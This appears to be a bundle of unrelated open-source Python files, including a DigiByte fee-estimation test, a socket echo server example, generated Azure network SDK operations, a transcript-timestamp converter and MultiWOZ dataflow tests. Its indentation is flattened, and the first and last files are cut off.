tx.vout.append(CTxOut(int(half_change * COIN), P2SH_1))
tx.vout.append(CTxOut(int(rem_change * COIN), P2SH_2))
# If this is the initial split we actually need to sign the transaction
# Otherwise we just need to insert the proper ScriptSig
if (initial_split):
completetx = from_node.signrawtransactionwithwallet(ToHex(tx))["hex"]
else:
tx.vin[0].scriptSig = SCRIPT_SIG[prevtxout["vout"]]
completetx = ToHex(tx)
txid = from_node.sendrawtransaction(completetx, True)
txouts.append({"txid": txid, "vout": 0, "amount": half_change})
txouts.append({"txid": txid, "vout": 1, "amount": rem_change})
def check_estimates(node, fees_seen):
"""Call estimatesmartfee and verify that the estimates meet certain invariants."""
delta = 1.0e-6 # account for rounding error
last_feerate = float(max(fees_seen))
all_smart_estimates = [node.estimatesmartfee(i) for i in range(1, 26)]
for i, e in enumerate(all_smart_estimates): # estimate is for i+1
feerate = float(e["feerate"])
assert_greater_than(feerate, 0)
if feerate + delta < min(fees_seen) or feerate - delta > max(fees_seen):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"
% (feerate, min(fees_seen), max(fees_seen)))
if feerate - delta > last_feerate:
raise AssertionError("Estimated fee (%f) larger than last fee (%f) for lower number of confirms"
% (feerate, last_feerate))
last_feerate = feerate
if i == 0:
assert_equal(e["blocks"], 2)
else:
assert_greater_than_or_equal(i + 1, e["blocks"])
class EstimateFeeTest(DigiByteTestFramework):
def set_test_params(self):
self.num_nodes = 3
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
"""
        We'll set up the network to have 3 nodes that all mine with different parameters.
But first we need to use one node to create a lot of outputs
which we will use to generate our transactions.
"""
self.add_nodes(3, extra_args=[["-maxorphantx=1000", "-whitelist=127.0.0.1"],
["-blockmaxweight=68000", "-maxorphantx=1000"],
["-blockmaxweight=32000", "-maxorphantx=1000"]])
# Use node0 to mine blocks for input splitting
        # Node1 mines small blocks, but ones still bigger than the expected transaction rate.
# NOTE: the CreateNewBlock code starts counting block weight at 4,000 weight,
# (68k weight is room enough for 120 or so transactions)
# Node2 is a stingy miner, that
# produces too small blocks (room for only 55 or so transactions)
def transact_and_mine(self, numblocks, mining_node):
min_fee = Decimal("0.00001")
# We will now mine numblocks blocks generating on average 100 transactions between each block
# We shuffle our confirmed txout set before each set of transactions
# small_txpuzzle_randfee will use the transactions that have inputs already in the chain when possible
# resorting to tx's that depend on the mempool when those run out
for i in range(numblocks):
random.shuffle(self.confutxo)
for j in range(random.randrange(100 - 50, 100 + 50)):
from_index = random.randint(1, 2)
(txhex, fee) = small_txpuzzle_randfee(self.nodes[from_index], self.confutxo,
self.memutxo, Decimal("0.005"), min_fee, min_fee)
tx_kbytes = (len(txhex) // 2) / 1000.0
self.fees_per_kb.append(float(fee) / tx_kbytes)
sync_mempools(self.nodes[0:3], wait=.1)
mined = mining_node.getblock(mining_node.generate(1)[0], True)["tx"]
sync_blocks(self.nodes[0:3], wait=.1)
# update which txouts are confirmed
newmem = []
for utx in self.memutxo:
if utx["txid"] in mined:
self.confutxo.append(utx)
else:
newmem.append(utx)
self.memutxo = newmem
def import_deterministic_coinbase_privkeys(self):
self.start_nodes()
super().import_deterministic_coinbase_privkeys()
self.stop_nodes()
def run_test(self):
self.log.info("This test is time consuming, please be patient")
self.log.info("Splitting inputs so we can generate tx's")
# Start node0
self.start_node(0)
self.txouts = []
self.txouts2 = []
# Split a coinbase into two transaction puzzle outputs
split_inputs(self.nodes[0], self.nodes[0].listunspent(0), self.txouts, True)
# Mine
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
# Repeatedly split those 2 outputs, doubling twice for each rep
# Use txouts to monitor the available utxo, since these won't be tracked in wallet
reps = 0
while (reps < 5):
# Double txouts to txouts2
while (len(self.txouts) > 0):
split_inputs(self.nodes[0], self.txouts, self.txouts2)
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
# Double txouts2 to txouts
while (len(self.txouts2) > 0):
split_inputs(self.nodes[0], self.txouts2, self.txouts)
while (len(self.nodes[0].getrawmempool()) > 0):
self.nodes[0].generate(1)
reps += 1
self.log.info("Finished splitting")
# Now we can connect the other nodes, didn't want to connect them earlier
# so the estimates would not be affected by the splitting transactions
self.start_node(1)
self.start_node(2)
connect_nodes(self.nodes[1], 0)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[2], 1)
self.sync_all()
self.fees_per_kb = []
self.memutxo = []
self.confutxo = self.txouts # Start with the set of confirmed txouts after splitting
self.log.info("Will output estimates for 1/2/3/6/15/25 blocks")
for i in range(2):
self.log.info("Creating transactions and mining them with a block size that can't keep up")
# Create transactions and mine 10 small blocks with node 2, but create txs faster than we can mine
self.transact_and_mine(10, self.nodes[2])
check_estimates(self.nodes[1], self.fees_per_kb)
self.log.info("Creating transactions and mining them at a block size that is just big enough")
# Generate transactions while mining 10 more blocks, this time with node1
# which mines blocks with capacity just above the rate that transactions are being created
self.transact_and_mine(10, self.nodes[1])
check_estimates(self.nodes[1], self.fees_per_kb)
# Finish by mining a normal-sized block:
while len(self.nodes[1].getrawmempool()) > 0:
self.nodes[1].generate(1)
sync_blocks(self.nodes[0:3], wait=.1)
self.log.info("Final estimates after emptying mempools")
check_estimates(self.nodes[1], self.fees_per_kb)
if __name__ == '__main__':
EstimateFeeTest().main()
| digibyte/digibyte | test/functional/feature_fee_estimation.py | Python | mit | 11,548 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import SocketServer
import time
HOST = ''
PORT = 1234
ADDR = (HOST, PORT)
class MyRequestHandler(SocketServer.StreamRequestHandler):
def handle(self):
print('...connected from: {}'.format(self.client_address))
self.wfile.write('[{}] {}'.format(time.ctime(),
self.rfile.readline()))
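# Companion client sketch (not part of the original script): it assumes the
# server below is already running on localhost:1234, sends one newline
# terminated message and returns the timestamped echo. Illustrative only.
from socket import socket, AF_INET, SOCK_STREAM
def demo_client(message='Hello, world!'):
    tcpCli = socket(AF_INET, SOCK_STREAM)
    tcpCli.connect((HOST or 'localhost', PORT))
    tcpCli.send(message + '\n')  # StreamRequestHandler reads up to the newline
    reply = tcpCli.recv(1024)
    tcpCli.close()
    return reply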
if __name__ == '__main__':
tcpServ = SocketServer.TCPServer(ADDR, MyRequestHandler)
    print('waiting for connection...')
tcpServ.serve_forever()
| Furzoom/learnpython | app/test/TsTservSS.py | Python | mit | 553 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualRouterPeeringsOperations(object):
"""VirtualRouterPeeringsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified peering from a Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
"""Gets the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouterPeering, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualRouterPeering"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouterPeering')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
peering_name, # type: str
parameters, # type: "_models.VirtualRouterPeering"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualRouterPeering"]
"""Creates or updates the specified Virtual Router Peering.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param peering_name: The name of the Virtual Router Peering.
:type peering_name: str
:param parameters: Parameters supplied to the create or update Virtual Router Peering
operation.
:type parameters: ~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualRouterPeering or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeering]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeering"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
peering_name=peering_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeering', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'peeringName': self._serialize.url("peering_name", peering_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings/{peeringName}'} # type: ignore
def list(
self,
resource_group_name, # type: str
virtual_router_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualRouterPeeringListResult"]
"""Lists all Virtual Router Peerings in a Virtual Router resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterPeeringListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_09_01.models.VirtualRouterPeeringListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterPeeringListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterPeeringListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}/peerings'} # type: ignore
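# Usage sketch (not part of the generated code, kept as comments only): in
# practice this operations class is reached through the azure-mgmt-network
# NetworkManagementClient as `client.virtual_router_peerings`; the credential
# class and every resource name below are placeholders/assumptions.
#
#     from azure.identity import DefaultAzureCredential
#     from azure.mgmt.network import NetworkManagementClient
#
#     client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
#     peering = client.virtual_router_peerings.get(
#         "my-resource-group", "my-virtual-router", "my-peering")
#     poller = client.virtual_router_peerings.begin_delete(
#         "my-resource-group", "my-virtual-router", "my-peering")
#     poller.wait()  # block until the long-running delete completes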
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_09_01/operations/_virtual_router_peerings_operations.py | Python | mit | 22,524 |
from helper_sql import sqlExecute
def insert(t):
sqlExecute('''INSERT INTO sent VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)''', *t)
| bmng-dev/PyBitmessage | src/helper_sent.py | Python | mit | 132 |
from . import adaptVor_driver
from .adaptVor_driver import AdaptiveVoronoiDriver
| westpa/westpa | src/westext/adaptvoronoi/__init__.py | Python | mit | 82 |
import os
import sys
def main():
if len(sys.argv) != 2:
print("Usage: Pass the file name for the source transcript txt file.")
sys.exit(-1)
file = sys.argv[1]
out_file = os.path.expanduser(
os.path.join(
'~/Desktop',
os.path.basename(file)
)
)
print("Files:")
print("Reading source file: ", file)
print("Exported version at: ", out_file)
fin = open(file, 'r', encoding='utf-8')
fout = open(out_file, 'w', encoding='utf-8')
with fin, fout:
time = "0:00"
for line in fin:
if is_time(line):
time = get_time_text(line)
elif line and line.strip():
text = f"{time} {line.strip()}\n\n"
fout.write(text)
# print(text)
def is_time(line: str) -> bool:
if not line or not line.strip():
return False
parts = line.split(':')
if not parts:
return False
return all(p.strip().isnumeric() for p in parts)
def get_time_text(line: str) -> str:
if ':' not in line:
raise Exception(f"Text doesn't seem to be a time: {line}")
parts = line.split(':')
hour_text = "0"
min_text = "0"
sec_text = "0"
if len(parts) == 3:
hour_text = parts[0].strip()
min_text = parts[1].strip()
sec_text = parts[2].strip()
elif len(parts) == 2:
min_text = parts[0].strip()
sec_text = parts[1].strip()
elif len(parts) == 1:
sec_text = parts[0].strip()
return f"{hour_text.zfill(2)}:{min_text.zfill(2)}:{sec_text.zfill(2)}"
if __name__ == '__main__':
main()
| mikeckennedy/python_bytes_show_notes | tools/otter_ai_to_our_format.py | Python | mit | 1,657 |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
from typing import Any, Dict, Iterator, List
from dataflow.core.utterance_tokenizer import UtteranceTokenizer
from dataflow.multiwoz.create_programs import create_programs_for_trade_dialogue
from dataflow.multiwoz.salience_model import DummySalienceModel, VanillaSalienceModel
def load_test_trade_dialogues(data_dir: str) -> Iterator[Dict[str, Any]]:
"""Returns selected test dialogues.
To extract a dialogue from the TRADE processed json file:
$ jq '.[] | select (.dialogue_idx == "MUL1626.json")' dev_dials.json
"""
multiwoz_2_1_dir = os.path.join(data_dir, "multiwoz_2_1")
for dialogue_id in [
"MUL1626.json",
"PMUL3166.json",
"MUL2258.json",
"MUL2199.json",
"MUL2096.json",
"PMUL3470.json",
"PMUL4478.json",
]:
trade_dialogue_file = os.path.join(multiwoz_2_1_dir, dialogue_id)
trade_dialogue = json.load(open(trade_dialogue_file))
yield trade_dialogue
def test_create_programs_with_dummy_salience_model(data_dir: str):
"""Tests creating programs with a dummy salience model."""
utterance_tokenizer = UtteranceTokenizer()
salience_model = DummySalienceModel()
expected_num_refer_calls = {
"MUL1626.json": 0,
"PMUL3166.json": 0,
"MUL2258.json": 0,
"MUL2199.json": 0,
"MUL2096.json": 0,
"PMUL3470.json": 0,
"PMUL4478.json": 0,
}
for trade_dialogue in load_test_trade_dialogues(data_dir):
dataflow_dialogue, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
dialogue_id = dataflow_dialogue.dialogue_id
assert (
num_refer_calls == expected_num_refer_calls[dialogue_id]
), "{} failed".format(dialogue_id)
def test_create_programs_without_revise(data_dir: str):
"""Tests creating programs without revise calls.
It should not use refer calls even with a valid salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
for trade_dialogue in load_test_trade_dialogues(data_dir):
for avoid_empty_plan in [True, False]:
_, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=True,
avoid_empty_plan=avoid_empty_plan,
utterance_tokenizer=utterance_tokenizer,
)
assert num_refer_calls == 0
def test_create_programs_with_vanilla_salience_model(data_dir: str):
"""Tests creating programs with a vanilla salience model.
"""
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_num_refer_calls = {
"MUL1626.json": 1,
"PMUL3166.json": 0,
"MUL2258.json": 1,
"MUL2199.json": 1,
"MUL2096.json": 0,
"PMUL3470.json": 0,
"PMUL4478.json": 0,
}
for trade_dialogue in load_test_trade_dialogues(data_dir):
dataflow_dialogue, num_refer_calls, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
dialogue_id = dataflow_dialogue.dialogue_id
assert (
num_refer_calls == expected_num_refer_calls[dialogue_id]
), "{} failed".format(dialogue_id)
def test_create_programs_with_revise(trade_dialogue_1: Dict[str, Any]):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :name (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west")))""",
# turn 6
"""(find (Constraint[Restaurant] :area (refer (Constraint[Area]))))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"()",
# turn 9
"""(find (Constraint[Taxi] :departure (?= "none")))""",
# turn 10
"()",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
for turn, expected_lispress in zip(dataflow_dialogue.turns, expected_plans):
lispress = turn.lispress
assert lispress == expected_lispress
def test_create_programs_with_revise_with_fill_none(trade_dialogue_1: Dict[str, Any]):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :area (?= "none") :book-day (?= "none") :book-people (?= "none") :book-stay (?= "none") :internet (?= "none") :name (?= "none") :parking (?= "none") :pricerange (?= "none") :stars (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west") :book-day (?= "none") :book-people (?= "none") :book-stay (?= "none") :internet (?= "none") :name (?= "none") :parking (?= "none") :pricerange (?= "none") :stars (?= "none") :type (?= "none")))""",
# turn 6
